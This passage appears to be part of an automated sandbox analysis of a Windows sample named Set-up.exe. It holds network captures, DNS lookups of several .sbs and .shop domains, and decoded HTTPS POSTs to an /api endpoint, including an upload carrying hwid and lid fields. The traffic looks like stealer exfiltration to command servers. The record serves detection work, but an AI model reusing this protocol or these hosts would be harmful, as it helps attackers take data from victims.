                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.282118082 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.282147884 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.282155991 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.282166004 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.283334017 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.349061012 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.349076033 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.349153996 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.349184036 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.349204063 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.349225044 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.349235058 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.349250078 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.349275112 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.349292994 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.349962950 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.349992037 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.350028992 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.350043058 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.350054026 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.350080013 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.367283106 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.367299080 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.367419004 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.367429972 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.367443085 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.367460966 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.367492914 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.367505074 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.367522001 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.367547989 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.367675066 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.367691040 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.367731094 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.367739916 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.367758989 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.367775917 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.368777037 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.368792057 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.368833065 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.368839025 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.368875980 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.369057894 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.369074106 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.369107962 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.369117022 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.369132042 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.369152069 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.437016010 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.437030077 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.437098980 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.437114954 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.437150955 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.437206030 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.437221050 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.437261105 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.437268019 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.437290907 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.699271917 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.699332952 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.699340105 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.699378014 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.724875927 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.724895954 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.724944115 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.724962950 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.724977016 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.725080967 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.725116014 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.725131035 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.725166082 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.725172997 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.725183010 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.725208998 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.725445986 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.725460052 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.725497961 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.725505114 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.725532055 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.725545883 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.725836039 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.725852013 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.725883961 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.725891113 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.725910902 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.725928068 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.726092100 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.726106882 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.726150036 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.726160049 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.726200104 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.784904957 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.784925938 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.784972906 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.784987926 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.785012960 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.785029888 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.785037041 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.785047054 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.785068989 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.785092115 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.785099030 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.785134077 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.785456896 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.785475016 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.785521030 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.785527945 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.785553932 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.785573006 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.811372042 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.811392069 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.811459064 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.811469078 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.811510086 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.811651945 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.811670065 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.811706066 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.811712980 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.811739922 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.811758041 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.812134027 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.812150955 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.812199116 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.812205076 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.812236071 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.812247038 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.812256098 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.812268019 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.812284946 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.812320948 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.812371969 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.812386036 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.812431097 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.812438965 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.812475920 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.871685982 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.871701956 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.871903896 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.871937990 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.872005939 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.872005939 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.872025967 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.872056961 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.872098923 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.872112989 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.073509932 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.073530912 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.073553085 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133074999 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133091927 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133143902 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133163929 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133174896 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133183956 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133202076 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133203983 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133219957 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133236885 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133275032 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133377075 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133392096 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133433104 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133486032 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133590937 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.157649994 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.157649994 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.157677889 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.157687902 CET44349758172.67.208.58192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 5, 2025 18:53:15.812124014 CET | 54908 | 53 | 192.168.2.4 | 1.1.1.1
Jan 5, 2025 18:53:15.826906919 CET | 53 | 54908 | 1.1.1.1 | 192.168.2.4
Jan 5, 2025 18:53:26.153345108 CET | 64711 | 53 | 192.168.2.4 | 1.1.1.1
Jan 5, 2025 18:53:26.260864973 CET | 53 | 64711 | 1.1.1.1 | 192.168.2.4
Jan 5, 2025 18:53:27.179639101 CET | 59962 | 53 | 192.168.2.4 | 1.1.1.1
Jan 5, 2025 18:53:27.193217993 CET | 53 | 59962 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 5, 2025 18:53:15.812124014 CET | 192.168.2.4 | 1.1.1.1 | 0xaa58 | Standard query (0) | cellardesiresso.sbs | A (IP address) | IN (0x0001) | false
Jan 5, 2025 18:53:26.153345108 CET | 192.168.2.4 | 1.1.1.1 | 0x67d0 | Standard query (0) | cegu.shop | A (IP address) | IN (0x0001) | false
Jan 5, 2025 18:53:27.179639101 CET | 192.168.2.4 | 1.1.1.1 | 0xaf5d | Standard query (0) | klipvumisui.shop | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 5, 2025 18:53:15.826906919 CET | 1.1.1.1 | 192.168.2.4 | 0xaa58 | No error (0) | cellardesiresso.sbs | | 104.21.87.8 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 18:53:15.826906919 CET | 1.1.1.1 | 192.168.2.4 | 0xaa58 | No error (0) | cellardesiresso.sbs | | 172.67.139.30 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 18:53:26.260864973 CET | 1.1.1.1 | 192.168.2.4 | 0x67d0 | No error (0) | cegu.shop | | 185.161.251.21 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 18:53:27.193217993 CET | 1.1.1.1 | 192.168.2.4 | 0xaf5d | No error (0) | klipvumisui.shop | | 172.67.208.58 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 18:53:27.193217993 CET | 1.1.1.1 | 192.168.2.4 | 0xaf5d | No error (0) | klipvumisui.shop | | 104.21.37.128 | A (IP address) | IN (0x0001) | false

                                                                                                                                                                                                                                                            • cellardesiresso.sbs
                                                                                                                                                                                                                                                            • cegu.shop
                                                                                                                                                                                                                                                            • klipvumisui.shop

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49748 | 104.21.87.8 | 443 | 3492 | C:\Users\user\Desktop\Set-up.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-05 17:53:16 UTC | 266 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                            Host: cellardesiresso.sbs
2025-01-05 17:53:16 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                            Data Ascii: act=life
2025-01-05 17:53:16 UTC | 1127 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sun, 05 Jan 2025 17:53:16 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=bq07q1u8clnha72smnq3n2h4h0; expires=Thu, 01 May 2025 11:39:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=At6leZwR%2BJPMn%2FdD9HmG1Y3jYaLUDm7nB7zF0nNInNCESy7h84wBYl9H37mA3gOJZg2UhaPH%2BRfx%2FbcIBSDNP1Ypvw3HYYxdS3UpmPit73r3G2jOD0y0isma7tQMKzt6P90vOxCv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fd553adadab7d1c-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1928&min_rtt=1897&rtt_var=774&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=910&delivery_rate=1360037&cwnd=157&unsent_bytes=0&cid=fbcb3ad17d77986f&ts=568&x=0"
2025-01-05 17:53:16 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 2ok
2025-01-05 17:53:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49749 | 104.21.87.8 | 443 | 3492 | C:\Users\user\Desktop\Set-up.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-05 17:53:17 UTC | 267 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 79
                                                                                                                                                                                                                                                            Host: cellardesiresso.sbs
2025-01-05 17:53:17 UTC | 79 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 4a 45 4e 59 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64
                                                                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--JENYA&j=efdebde057a1df3f7c15b7f4da907c2d
2025-01-05 17:53:17 UTC | 1133 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sun, 05 Jan 2025 17:53:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=bup561u08hcihf0j0d6culg909; expires=Thu, 01 May 2025 11:39:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MMX%2Bnq6DwwTnn2e6jkHx2%2FnxrFmfp2fQ2AsSd82XdPpglx1c8s5HuJ%2Fz90ZdaQpT53O0BuoomoHwTQJZAB1moirwEdhylI20OvtgCPSwydO7rjbf0%2F%2Fc%2FOB9lkycCsQGGJW%2FMCoi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fd553b41b874401-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1675&min_rtt=1656&rtt_var=659&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=982&delivery_rate=1614151&cwnd=233&unsent_bytes=0&cid=20502cc2702fd80f&ts=554&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49750 | 104.21.87.84 | 443 | 3492 | C:\Users\user\Desktop\Set-up.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-05 17:53:18 UTC | 277 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=9JRIGM89O7
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 18115
                                                                                                                                                                                                                                                            Host: cellardesiresso.sbs
2025-01-05 17:53:18 UTC | 15331 | OUT | Data Ascii:
--9JRIGM89O7
Content-Disposition: form-data; name="hwid"

C127CF45B8E8371785E74BC4E94691B5
--9JRIGM89O7
Content-Disposition: form-data; name="pid"

2
--9JRIGM89O7
Content-Disposition: form-data; name="lid"

hRjzG3--JENYA
--9JRIGM89O7
Content-
2025-01-05 17:53:19 UTC | 1133 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sun, 05 Jan 2025 17:53:19 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=5t6uaeit4mnvlbiljaklto2sft; expires=Thu, 01 May 2025 11:39:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
